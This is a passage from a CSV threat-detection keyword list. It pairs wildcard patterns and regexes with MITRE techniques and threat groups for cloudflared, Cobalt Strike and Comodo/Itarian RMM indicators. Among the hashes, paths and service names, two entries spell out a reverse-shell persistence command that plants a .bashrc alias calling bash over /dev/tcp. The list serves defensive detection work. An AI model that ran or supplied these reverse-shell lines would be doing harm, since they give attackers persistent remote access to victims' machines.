Spider*","C2","https://github.com/cloudflare/cloudflared","1","0","#filehash","N/A","10","10","8745","773","2024-08-26T21:41:20Z","2017-10-13T19:54:47Z" "*569b8925a41bd1426fc9f88a4d00aa93da747ed4a5ec1c638678ac62ae1a7114*",".{0,1000}569b8925a41bd1426fc9f88a4d00aa93da747ed4a5ec1c638678ac62ae1a7114.{0,1000}","greyware_tool_keyword","cloudflared","cloudfared Contains the command-line client for Cloudflare Tunnel - a tunneling daemon that proxies traffic from the Cloudflare network to your origins","T1572 - T1090 - T1071","TA0001 - TA0011","N/A","BlackSuit - Royal - Akira - Scattered Spider*","C2","https://github.com/cloudflare/cloudflared","1","0","#filehash","N/A","10","10","8745","773","2024-08-26T21:41:20Z","2017-10-13T19:54:47Z" "*5868fed5581f3fb186c94b6be63f8b056c571159edb65cc5dafb84553e888d39*",".{0,1000}5868fed5581f3fb186c94b6be63f8b056c571159edb65cc5dafb84553e888d39.{0,1000}","greyware_tool_keyword","cloudflared","cloudfared Contains the command-line client for 
Cloudflare Tunnel - a tunneling daemon that proxies traffic from the Cloudflare network to your origins","T1572 - T1090 - T1071","TA0001 - TA0011","N/A","BlackSuit - Royal - Akira - Scattered Spider*","C2","https://github.com/cloudflare/cloudflared","1","0","#filehash","N/A","10","10","8745","773","2024-08-26T21:41:20Z","2017-10-13T19:54:47Z" "*62700c23ce8560628d8eb07ab2adcf863ad901c9f631bb45ed4b4f801f35b2a5*",".{0,1000}62700c23ce8560628d8eb07ab2adcf863ad901c9f631bb45ed4b4f801f35b2a5.{0,1000}","greyware_tool_keyword","cloudflared","cloudfared Contains the command-line client for Cloudflare Tunnel - a tunneling daemon that proxies traffic from the Cloudflare network to your origins","T1572 - T1090 - T1071","TA0001 - TA0011","N/A","BlackSuit - Royal - Akira - Scattered Spider*","C2","https://github.com/cloudflare/cloudflared","1","0","#filehash","N/A","10","10","8745","773","2024-08-26T21:41:20Z","2017-10-13T19:54:47Z" "*6ee5eab9a9aa836ac397746a20afbb671971c6553bf8d6a844ba0a7a8de8447e*",".{0,1000}6ee5eab9a9aa836ac397746a20afbb671971c6553bf8d6a844ba0a7a8de8447e.{0,1000}","greyware_tool_keyword","cloudflared","cloudfared Contains the command-line client for Cloudflare Tunnel - a tunneling daemon that proxies traffic from the Cloudflare network to your origins","T1572 - T1090 - T1071","TA0001 - TA0011","N/A","BlackSuit - Royal - Akira - Scattered Spider*","C2","https://github.com/cloudflare/cloudflared","1","0","#filehash","N/A","10","10","8745","773","2024-08-26T21:41:20Z","2017-10-13T19:54:47Z" "*9a6f666b2d691d7c6aadd7b854b26cffd76735e9622f3613577b556fe29eb6a1*",".{0,1000}9a6f666b2d691d7c6aadd7b854b26cffd76735e9622f3613577b556fe29eb6a1.{0,1000}","greyware_tool_keyword","cloudflared","cloudfared Contains the command-line client for Cloudflare Tunnel - a tunneling daemon that proxies traffic from the Cloudflare network to your origins","T1572 - T1090 - T1071","TA0001 - TA0011","N/A","BlackSuit - Royal - Akira - Scattered 
Spider*","C2","https://github.com/cloudflare/cloudflared","1","0","#filehash","N/A","10","10","8745","773","2024-08-26T21:41:20Z","2017-10-13T19:54:47Z" "*b3d21940a10fdef5e415ad70331ce257c24fe3bcf7722262302e0421791f87e8*",".{0,1000}b3d21940a10fdef5e415ad70331ce257c24fe3bcf7722262302e0421791f87e8.{0,1000}","greyware_tool_keyword","cloudflared","cloudfared Contains the command-line client for Cloudflare Tunnel - a tunneling daemon that proxies traffic from the Cloudflare network to your origins","T1572 - T1090 - T1071","TA0001 - TA0011","N/A","BlackSuit - Royal - Akira - Scattered Spider*","C2","https://github.com/cloudflare/cloudflared","1","0","#filehash","N/A","10","10","8745","773","2024-08-26T21:41:20Z","2017-10-13T19:54:47Z" "*b7e394578b41e9a71857e59d04b7bf582e3d0d15f314ab69f269be474a4b9e1a*",".{0,1000}b7e394578b41e9a71857e59d04b7bf582e3d0d15f314ab69f269be474a4b9e1a.{0,1000}","greyware_tool_keyword","cloudflared","cloudfared Contains the command-line client for Cloudflare Tunnel - a tunneling daemon that proxies traffic from the Cloudflare network to your origins","T1572 - T1090 - T1071","TA0001 - TA0011","N/A","BlackSuit - Royal - Akira - Scattered Spider*","C2","https://github.com/cloudflare/cloudflared","1","0","#filehash","N/A","10","10","8745","773","2024-08-26T21:41:20Z","2017-10-13T19:54:47Z" "*ca6ac5c1c1f30675eecf91fe295d703007a754c1b320609ede7aa4783d899e9e*",".{0,1000}ca6ac5c1c1f30675eecf91fe295d703007a754c1b320609ede7aa4783d899e9e.{0,1000}","greyware_tool_keyword","cloudflared","cloudfared Contains the command-line client for Cloudflare Tunnel - a tunneling daemon that proxies traffic from the Cloudflare network to your origins","T1572 - T1090 - T1071","TA0001 - TA0011","N/A","BlackSuit - Royal - Akira - Scattered Spider*","C2","https://github.com/cloudflare/cloudflared","1","0","#filehash","N/A","10","10","8745","773","2024-08-26T21:41:20Z","2017-10-13T19:54:47Z" "*--chown=nonroot /go/src/github.com/cloudflare/cloudflared/cloudflared 
/usr/local/bin/*",".{0,1000}\-\-chown\=nonroot\s\/go\/src\/github\.com\/cloudflare\/cloudflared\/cloudflared\s\/usr\/local\/bin\/.{0,1000}","greyware_tool_keyword","cloudflared","cloudfared Contains the command-line client for Cloudflare Tunnel - a tunneling daemon that proxies traffic from the Cloudflare network to your origins","T1572 - T1090 - T1071","TA0001 - TA0011","N/A","BlackSuit - Royal - Akira - Scattered Spider*","C2","https://github.com/cloudflare/cloudflared","1","0","N/A","N/A","10","10","8745","773","2024-08-26T21:41:20Z","2017-10-13T19:54:47Z" "*cloudflared tunnel --config *",".{0,1000}cloudflared\stunnel\s\-\-config\s.{0,1000}","greyware_tool_keyword","cloudflared","cloudfared Contains the command-line client for Cloudflare Tunnel - a tunneling daemon that proxies traffic from the Cloudflare network to your origins","T1572 - T1090 - T1071","TA0001 - TA0011","N/A","BlackSuit - Royal - Akira - Scattered Spider*","C2","https://github.com/cloudflare/cloudflared","1","0","N/A","N/A","10","10","8745","773","2024-08-26T21:41:20Z","2017-10-13T19:54:47Z" "*cloudflared tunnel create *",".{0,1000}cloudflared\stunnel\screate\s.{0,1000}","greyware_tool_keyword","cloudflared","cloudfared Contains the command-line client for Cloudflare Tunnel - a tunneling daemon that proxies traffic from the Cloudflare network to your origins","T1572 - T1090 - T1071","TA0001 - TA0011","N/A","BlackSuit - Royal - Akira - Scattered Spider*","C2","https://github.com/cloudflare/cloudflared","1","0","N/A","N/A","10","10","8745","773","2024-08-26T21:41:20Z","2017-10-13T19:54:47Z" "*cloudflared tunnel info *",".{0,1000}cloudflared\stunnel\sinfo\s.{0,1000}","greyware_tool_keyword","cloudflared","cloudfared Contains the command-line client for Cloudflare Tunnel - a tunneling daemon that proxies traffic from the Cloudflare network to your origins","T1572 - T1090 - T1071","TA0001 - TA0011","N/A","BlackSuit - Royal - Akira - Scattered 
Spider*","C2","https://github.com/cloudflare/cloudflared","1","0","N/A","N/A","10","10","8745","773","2024-08-26T21:41:20Z","2017-10-13T19:54:47Z" "*cloudflared tunnel list*",".{0,1000}cloudflared\stunnel\slist.{0,1000}","greyware_tool_keyword","cloudflared","cloudfared Contains the command-line client for Cloudflare Tunnel - a tunneling daemon that proxies traffic from the Cloudflare network to your origins","T1572 - T1090 - T1071","TA0001 - TA0011","N/A","BlackSuit - Royal - Akira - Scattered Spider*","C2","https://github.com/cloudflare/cloudflared","1","0","N/A","N/A","10","10","8745","773","2024-08-26T21:41:20Z","2017-10-13T19:54:47Z" "*cloudflared tunnel login*",".{0,1000}cloudflared\stunnel\slogin.{0,1000}","greyware_tool_keyword","cloudflared","cloudfared Contains the command-line client for Cloudflare Tunnel - a tunneling daemon that proxies traffic from the Cloudflare network to your origins","T1572 - T1090 - T1071","TA0001 - TA0011","N/A","BlackSuit - Royal - Akira - Scattered Spider*","C2","https://github.com/cloudflare/cloudflared","1","0","N/A","N/A","10","10","8745","773","2024-08-26T21:41:20Z","2017-10-13T19:54:47Z" "*cloudflared tunnel route dns *",".{0,1000}cloudflared\stunnel\sroute\sdns\s.{0,1000}","greyware_tool_keyword","cloudflared","cloudfared Contains the command-line client for Cloudflare Tunnel - a tunneling daemon that proxies traffic from the Cloudflare network to your origins","T1572 - T1090 - T1071","TA0001 - TA0011","N/A","BlackSuit - Royal - Akira - Scattered Spider*","C2","https://github.com/cloudflare/cloudflared","1","0","N/A","N/A","10","10","8745","773","2024-08-26T21:41:20Z","2017-10-13T19:54:47Z" "*cloudflared tunnel route ip add *",".{0,1000}cloudflared\stunnel\sroute\sip\sadd\s.{0,1000}","greyware_tool_keyword","cloudflared","cloudfared Contains the command-line client for Cloudflare Tunnel - a tunneling daemon that proxies traffic from the Cloudflare network to your origins","T1572 - T1090 - T1071","TA0001 - 
TA0011","N/A","BlackSuit - Royal - Akira - Scattered Spider*","C2","https://github.com/cloudflare/cloudflared","1","0","N/A","N/A","10","10","8745","773","2024-08-26T21:41:20Z","2017-10-13T19:54:47Z" "*cloudflared tunnel route ip show*",".{0,1000}cloudflared\stunnel\sroute\sip\sshow.{0,1000}","greyware_tool_keyword","cloudflared","cloudflared Contains the command-line client for Cloudflare Tunnel - a tunneling daemon that proxies traffic from the Cloudflare network to your origins","T1572 - T1090 - T1071","TA0001 - TA0011","N/A","BlackSuit - Royal - Akira - Scattered Spider*","C2","https://github.com/cloudflare/cloudflared","1","0","N/A","N/A","10","10","8745","773","2024-08-26T21:41:20Z","2017-10-13T19:54:47Z" "*cloudflared tunnel run *",".{0,1000}cloudflared\stunnel\srun\s.{0,1000}","greyware_tool_keyword","cloudflared","cloudflared Contains the command-line client for Cloudflare Tunnel - a tunneling daemon that proxies traffic from the Cloudflare network to your origins","T1572 - T1090 - T1071","TA0001 - TA0011","N/A","BlackSuit - Royal - Akira - Scattered Spider*","C2","https://github.com/cloudflare/cloudflared","1","0","N/A","N/A","10","10","8745","773","2024-08-26T21:41:20Z","2017-10-13T19:54:47Z" "*cloudflared-amd64.pkg*",".{0,1000}cloudflared\-amd64\.pkg.{0,1000}","greyware_tool_keyword","cloudflared","cloudflared Contains the command-line client for Cloudflare Tunnel - a tunneling daemon that proxies traffic from the Cloudflare network to your origins","T1572 - T1090 - T1071","TA0001 - TA0011","N/A","BlackSuit - Royal - Akira - Scattered Spider*","C2","https://github.com/cloudflare/cloudflared","1","1","N/A","N/A","10","10","8745","773","2024-08-26T21:41:20Z","2017-10-13T19:54:47Z" "*cloudflared-windows-386.exe*",".{0,1000}cloudflared\-windows\-386\.exe.{0,1000}","greyware_tool_keyword","cloudflared","cloudflared Contains the command-line client for Cloudflare Tunnel - a tunneling daemon that proxies traffic from the Cloudflare network to your origins","T1572 
- T1090 - T1071","TA0001 - TA0011","N/A","BlackSuit - Royal - Akira - Scattered Spider*","C2","https://github.com/cloudflare/cloudflared","1","1","N/A","N/A","10","10","8745","773","2024-08-26T21:41:20Z","2017-10-13T19:54:47Z" "*cloudflared-windows-amd64.exe*",".{0,1000}cloudflared\-windows\-amd64\.exe.{0,1000}","greyware_tool_keyword","cloudflared","cloudflared Contains the command-line client for Cloudflare Tunnel - a tunneling daemon that proxies traffic from the Cloudflare network to your origins","T1572 - T1090 - T1071","TA0001 - TA0011","N/A","BlackSuit - Royal - Akira - Scattered Spider*","C2","https://github.com/cloudflare/cloudflared","1","1","N/A","N/A","10","10","8745","773","2024-08-26T21:41:20Z","2017-10-13T19:54:47Z" "*cloudflared-windows-amd64.msi*",".{0,1000}cloudflared\-windows\-amd64\.msi.{0,1000}","greyware_tool_keyword","cloudflared","cloudflared Contains the command-line client for Cloudflare Tunnel - a tunneling daemon that proxies traffic from the Cloudflare network to your origins","T1572 - T1090 - T1071","TA0001 - TA0011","N/A","BlackSuit - Royal - Akira - Scattered Spider*","C2","https://github.com/cloudflare/cloudflared","1","1","N/A","N/A","10","10","8745","773","2024-08-26T21:41:20Z","2017-10-13T19:54:47Z" "*d6c358a2b66fae4f2c9fa4ffa8cd37f6ab9b7d27c83414f70c1d6a210812f0fa*",".{0,1000}d6c358a2b66fae4f2c9fa4ffa8cd37f6ab9b7d27c83414f70c1d6a210812f0fa.{0,1000}","greyware_tool_keyword","cloudflared","cloudflared Contains the command-line client for Cloudflare Tunnel - a tunneling daemon that proxies traffic from the Cloudflare network to your origins","T1572 - T1090 - T1071","TA0001 - TA0011","N/A","BlackSuit - Royal - Akira - Scattered Spider*","C2","https://github.com/cloudflare/cloudflared","1","0","#filehash","N/A","10","10","8745","773","2024-08-26T21:41:20Z","2017-10-13T19:54:47Z" 
"*d79111ec8fa3659c887dd4e82f8ce6ff39391de6860ca0c2045469d6ab76a44f*",".{0,1000}d79111ec8fa3659c887dd4e82f8ce6ff39391de6860ca0c2045469d6ab76a44f.{0,1000}","greyware_tool_keyword","cloudflared","cloudflared Contains the command-line client for Cloudflare Tunnel - a tunneling daemon that proxies traffic from the Cloudflare network to your origins","T1572 - T1090 - T1071","TA0001 - TA0011","N/A","BlackSuit - Royal - Akira - Scattered Spider*","C2","https://github.com/cloudflare/cloudflared","1","0","#filehash","N/A","10","10","8745","773","2024-08-26T21:41:20Z","2017-10-13T19:54:47Z" "*dc76f7c6b506d3ec4a92d9a0cda9678c3cb58a9096587dde15897709c7b23a33*",".{0,1000}dc76f7c6b506d3ec4a92d9a0cda9678c3cb58a9096587dde15897709c7b23a33.{0,1000}","greyware_tool_keyword","cloudflared","cloudflared Contains the command-line client for Cloudflare Tunnel - a tunneling daemon that proxies traffic from the Cloudflare network to your origins","T1572 - T1090 - T1071","TA0001 - TA0011","N/A","BlackSuit - Royal - Akira - Scattered Spider*","C2","https://github.com/cloudflare/cloudflared","1","0","#filehash","N/A","10","10","8745","773","2024-08-26T21:41:20Z","2017-10-13T19:54:47Z" "*e8118e74c74a62a1d8dc291cb626f46d0056b1284726c2a5d671e20a5e92270c*",".{0,1000}e8118e74c74a62a1d8dc291cb626f46d0056b1284726c2a5d671e20a5e92270c.{0,1000}","greyware_tool_keyword","cloudflared","cloudflared Contains the command-line client for Cloudflare Tunnel - a tunneling daemon that proxies traffic from the Cloudflare network to your origins","T1572 - T1090 - T1071","TA0001 - TA0011","N/A","BlackSuit - Royal - Akira - Scattered Spider*","C2","https://github.com/cloudflare/cloudflared","1","0","#filehash","N/A","10","10","8745","773","2024-08-26T21:41:20Z","2017-10-13T19:54:47Z" "*echo 'alias cat=/bin/bash -c 'bash -i >& /dev/tcp/*/* 0>&1'' >> */.bashrc* 
",".{0,1000}echo\s\'alias\scat\=\/bin\/bash\s\-c\s\'bash\s\-i\s\>\&\s\/dev\/tcp\/.{0,1000}\/.{0,1000}\s0\>\&1\'\'\s\>\>\s.{0,1000}\/\.bashrc.{0,1000}\s","greyware_tool_keyword","cloudflared","cloudflared Contains the command-line client for Cloudflare Tunnel - a tunneling daemon that proxies traffic from the Cloudflare network to your origins","T1572 - T1090 - T1071","TA0001 - TA0011","N/A","BlackSuit - Royal - Akira - Scattered Spider*","C2","https://github.com/cloudflare/cloudflared","1","0","N/A","N/A","10","10","8745","773","2024-08-26T21:41:20Z","2017-10-13T19:54:47Z" "*echo 'alias find=/bin/bash -c 'bash -i >& /dev/tcp/*/*>> ""$user/.bashrc""*",".{0,1000}echo\s\'alias\sfind\=\/bin\/bash\s\-c\s\'bash\s\-i\s\>\&\s\/dev\/tcp\/.{0,1000}\/.{0,1000}\>\>\s\""\$user\/\.bashrc\"".{0,1000}","greyware_tool_keyword","cloudflared","cloudflared Contains the command-line client for Cloudflare Tunnel - a tunneling daemon that proxies traffic from the Cloudflare network to your origins","T1572 - T1090 - T1071","TA0001 - TA0011","N/A","BlackSuit - Royal - Akira - Scattered Spider*","C2","https://github.com/cloudflare/cloudflared","1","0","N/A","N/A","10","10","8745","773","2024-08-26T21:41:20Z","2017-10-13T19:54:47Z" "*ed4f5607dbc3fec5d43fbc22fb12a79d8bca07aa60c8733db7f495b7210d631f*",".{0,1000}ed4f5607dbc3fec5d43fbc22fb12a79d8bca07aa60c8733db7f495b7210d631f.{0,1000}","greyware_tool_keyword","cloudflared","cloudflared Contains the command-line client for Cloudflare Tunnel - a tunneling daemon that proxies traffic from the Cloudflare network to your origins","T1572 - T1090 - T1071","TA0001 - TA0011","N/A","BlackSuit - Royal - Akira - Scattered Spider*","C2","https://github.com/cloudflare/cloudflared","1","0","#filehash","N/A","10","10","8745","773","2024-08-26T21:41:20Z","2017-10-13T19:54:47Z" 
"*fffec1382a3f65ecb8f1ebb2c74e3d7aa57485fb4cff4014aadc10b8e9f3abc8*",".{0,1000}fffec1382a3f65ecb8f1ebb2c74e3d7aa57485fb4cff4014aadc10b8e9f3abc8.{0,1000}","greyware_tool_keyword","cloudflared","cloudflared Contains the command-line client for Cloudflare Tunnel - a tunneling daemon that proxies traffic from the Cloudflare network to your origins","T1572 - T1090 - T1071","TA0001 - TA0011","N/A","BlackSuit - Royal - Akira - Scattered Spider*","C2","https://github.com/cloudflare/cloudflared","1","0","#filehash","N/A","10","10","8745","773","2024-08-26T21:41:20Z","2017-10-13T19:54:47Z" "*protocol-v2.argotunnel.com*",".{0,1000}protocol\-v2\.argotunnel\.com.{0,1000}","greyware_tool_keyword","cloudflared","cloudflared Contains the command-line client for Cloudflare Tunnel - a tunneling daemon that proxies traffic from the Cloudflare network to your origins","T1572 - T1090 - T1071","TA0001 - TA0011","N/A","BlackSuit - Royal - Akira - Scattered Spider*","C2","https://github.com/cloudflare/cloudflared","1","1","N/A","N/A","10","10","8745","773","2024-08-26T21:41:20Z","2017-10-13T19:54:47Z" "*sc create Cloudflared binPath=\*",".{0,1000}sc\screate\sCloudflared\sbinPath\=\\.{0,1000}","greyware_tool_keyword","cloudflared","cloudflared Contains the command-line client for Cloudflare Tunnel - a tunneling daemon that proxies traffic from the Cloudflare network to your origins","T1572 - T1090 - T1071","TA0001 - TA0011","N/A","BlackSuit - Royal - Akira - Scattered Spider*","C2","https://github.com/cloudflare/cloudflared","1","0","N/A","N/A","10","10","8745","773","2024-08-26T21:41:20Z","2017-10-13T19:54:47Z" "*sc.exe create Cloudflared binPath=\*",".{0,1000}sc\.exe\screate\sCloudflared\sbinPath\=\\.{0,1000}","greyware_tool_keyword","cloudflared","cloudflared Contains the command-line client for Cloudflare Tunnel - a tunneling daemon that proxies traffic from the Cloudflare network to your origins","T1572 - T1090 - T1071","TA0001 - TA0011","N/A","BlackSuit - Royal - Akira - Scattered 
Spider*","C2","https://github.com/cloudflare/cloudflared","1","0","N/A","N/A","10","10","8745","773","2024-08-26T21:41:20Z","2017-10-13T19:54:47Z" "*sudo systemctl edit --full cloudflared.service*",".{0,1000}sudo\ssystemctl\sedit\s\-\-full\scloudflared\.service.{0,1000}","greyware_tool_keyword","cloudflared","cloudflared Contains the command-line client for Cloudflare Tunnel - a tunneling daemon that proxies traffic from the Cloudflare network to your origins","T1572 - T1090 - T1071","TA0001 - TA0011","N/A","BlackSuit - Royal - Akira - Scattered Spider*","C2","https://github.com/cloudflare/cloudflared","1","0","N/A","N/A","10","10","8745","773","2024-08-26T21:41:20Z","2017-10-13T19:54:47Z" "*test-cloudflare-tunnel-cert-json.pem*",".{0,1000}test\-cloudflare\-tunnel\-cert\-json\.pem.{0,1000}","greyware_tool_keyword","cloudflared","cloudflared Contains the command-line client for Cloudflare Tunnel - a tunneling daemon that proxies traffic from the Cloudflare network to your origins","T1572 - T1090 - T1071","TA0001 - TA0011","N/A","BlackSuit - Royal - Akira - Scattered Spider*","C2","https://github.com/cloudflare/cloudflared","1","1","N/A","N/A","10","10","8745","773","2024-08-26T21:41:20Z","2017-10-13T19:54:47Z" "*update.argotunnel.com*",".{0,1000}update\.argotunnel\.com.{0,1000}","greyware_tool_keyword","cloudflared","cloudflared Contains the command-line client for Cloudflare Tunnel - a tunneling daemon that proxies traffic from the Cloudflare network to your origins","T1572 - T1090 - T1071","TA0001 - TA0011","N/A","BlackSuit - Royal - Akira - Scattered Spider*","C2","https://github.com/cloudflare/cloudflared","1","1","N/A","N/A","10","10","8745","773","2024-08-26T21:41:20Z","2017-10-13T19:54:47Z" "*\AppData\Local\Microsoft\CLR_*\UsageLogs\*.exe.log*",".{0,1000}\\AppData\\Local\\Microsoft\\CLR_.{0,1000}\\UsageLogs\\.{0,1000}\.exe\.log.{0,1000}","greyware_tool_keyword","cobaltstrike","If cobaltstrike uses execute-assembly there is a chance that a file will be created in 
the UsageLogs logs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - APT29 MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass","C2","https://bohops.com/2021/03/16/investigating-net-clr-usage-log-tampering-techniques-for-edr-evasion/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*cmd.exe /c echo * > \\.\pipe\*",".{0,1000}cmd\.exe\s\/c\secho\s.{0,1000}\s\>\s\\\\\.\\pipe\\.{0,1000}","greyware_tool_keyword","cobaltstrike","potential malleable Cobalt Strike profiles behavior","T1559 - T1134.001 - T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 
- T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - APT29 MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass","C2","https://github.com/IcebreakerSecurity/DelegationBOF","1","0","#namedpipe","N/A","10","10","135","23","2022-05-04T14:00:36Z","2022-03-28T20:14:24Z" "*.comodo.com/static/frontend/static-pages/enroll-wizard/token*",".{0,1000}\.comodo\.com\/static\/frontend\/static\-pages\/enroll\-wizard\/token.{0,1000}","greyware_tool_keyword","ComodoRMM (Itarian RMM)","Comodo offers IT Remote Management tools includes RMM Software - Remote Access - Service Desk - Patch Management and Network Assessment (Itarian RMM)","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://one.comodo.com/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*/RemoteControlSetup.exe*",".{0,1000}\/RemoteControlSetup\.exe.{0,1000}","greyware_tool_keyword","ComodoRMM (Itarian RMM)","Comodo offers IT Remote Management tools includes RMM Software - Remote Access - Service Desk - Patch Management and Network Assessment (Itarian RMM)","T1021 - T1071 - T1090","TA0003 
- TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://one.comodo.com/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*/tmp/*/enroll.sh*",".{0,1000}\/tmp\/.{0,1000}\/enroll\.sh.{0,1000}","greyware_tool_keyword","ComodoRMM (Itarian RMM)","Comodo offers IT Remote Management tools includes RMM Software - Remote Access - Service Desk - Patch Management and Network Assessment (Itarian RMM)","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://one.comodo.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*/tmp/*/itsm.service*",".{0,1000}\/tmp\/.{0,1000}\/itsm\.service.{0,1000}","greyware_tool_keyword","ComodoRMM (Itarian RMM)","Comodo offers IT Remote Management tools includes RMM Software - Remote Access - Service Desk - Patch Management and Network Assessment (Itarian RMM)","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://one.comodo.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*/tmp/*/itsm-linux*",".{0,1000}\/tmp\/.{0,1000}\/itsm\-linux.{0,1000}","greyware_tool_keyword","ComodoRMM (Itarian RMM)","Comodo offers IT Remote Management tools includes RMM Software - Remote Access - Service Desk - Patch Management and Network Assessment (Itarian RMM)","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://one.comodo.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*\AppData\Local\Temp\ITarian_Remote_Access_*",".{0,1000}\\AppData\\Local\\Temp\\ITarian_Remote_Access_.{0,1000}","greyware_tool_keyword","ComodoRMM (Itarian RMM)","Comodo offers IT Remote Management tools includes RMM Software - Remote Access - Service Desk - Patch Management and Network Assessment (Itarian RMM)","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://one.comodo.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" 
"*\AppData\Local\Temp\Remote_Control_by_Itarian*",".{0,1000}\\AppData\\Local\\Temp\\Remote_Control_by_Itarian.{0,1000}","greyware_tool_keyword","ComodoRMM (Itarian RMM)","Comodo offers IT Remote Management tools includes RMM Software - Remote Access - Service Desk - Patch Management and Network Assessment (Itarian RMM)","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://one.comodo.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*\ComodoRemoteControl.exe*",".{0,1000}\\ComodoRemoteControl\.exe.{0,1000}","greyware_tool_keyword","ComodoRMM (Itarian RMM)","Comodo offers IT Remote Management tools includes RMM Software - Remote Access - Service Desk - Patch Management and Network Assessment (Itarian RMM)","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://one.comodo.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*\CurrentControlSet\Services\ItsmRsp*",".{0,1000}\\CurrentControlSet\\Services\\ItsmRsp.{0,1000}","greyware_tool_keyword","ComodoRMM (Itarian RMM)","Comodo offers IT Remote Management tools includes RMM Software - Remote Access - Service Desk - Patch Management and Network Assessment (Itarian RMM)","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://one.comodo.com/","1","0","#servicename","N/A","10","10","N/A","N/A","N/A","N/A" "*\CurrentControlSet\Services\ITSMService*",".{0,1000}\\CurrentControlSet\\Services\\ITSMService.{0,1000}","greyware_tool_keyword","ComodoRMM (Itarian RMM)","Comodo offers IT Remote Management tools includes RMM Software - Remote Access - Service Desk - Patch Management and Network Assessment (Itarian RMM)","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://one.comodo.com/","1","0","#servicename","N/A","10","10","N/A","N/A","N/A","N/A" 
"*\CurrentControlSet\Services\RmmService*",".{0,1000}\\CurrentControlSet\\Services\\RmmService.{0,1000}","greyware_tool_keyword","ComodoRMM (Itarian RMM)","Comodo offers IT Remote Management tools includes RMM Software - Remote Access - Service Desk - Patch Management and Network Assessment (Itarian RMM)","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://one.comodo.com/","1","0","#servicename","N/A","10","10","N/A","N/A","N/A","N/A" "*\ITarian Remote Access.lnk*",".{0,1000}\\ITarian\sRemote\sAccess\.lnk.{0,1000}","greyware_tool_keyword","ComodoRMM (Itarian RMM)","Comodo offers IT Remote Management tools includes RMM Software - Remote Access - Service Desk - Patch Management and Network Assessment (Itarian RMM)","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://one.comodo.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*\itarian\endpoint 